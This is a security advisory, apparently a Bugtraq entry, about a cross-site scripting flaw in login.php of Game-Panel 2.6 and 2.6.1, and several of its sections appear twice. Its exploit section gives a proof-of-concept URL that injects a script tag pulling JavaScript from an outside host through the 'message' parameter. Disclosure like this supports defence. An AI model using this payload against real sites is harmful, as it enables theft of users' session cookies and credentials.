Game-Panel Login.PHP Cross-Site Scripting Vulnerability
BID:16979
Info
Game-Panel Login.PHP Cross-Site Scripting Vulnerability
| Bugtraq ID: | 16979 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 06 2006 12:00AM |
| Updated: | Mar 09 2006 09:25AM |
| Credit: | Discovered by retard, jim, and sycko. |
| Vulnerable: |
Game-Panel Game-Panel 2.6.1 Game-Panel Game-Panel 2.6 |
| Not Vulnerable: | |
Discussion
Game-Panel Login.PHP Cross-Site Scripting Vulnerability
Game-Panel is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Game-Panel is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
Game-Panel Login.PHP Cross-Site Scripting Vulnerability
This issue can be exploited through use of a web client.
The following proof-of-concept URI was provided:
http://www.example.com/login.php?message=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
This issue can be exploited through use of a web client.
The following proof-of-concept URI was provided:
http://www.example.com/login.php?message=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
Solution / Fix
Game-Panel Login.PHP Cross-Site Scripting Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
References
Game-Panel Login.PHP Cross-Site Scripting Vulnerability
References:
References:
- Game-Panel Web Site (Game-Panel)
- Game-Panel <= 2.1.6 XSS ([email protected])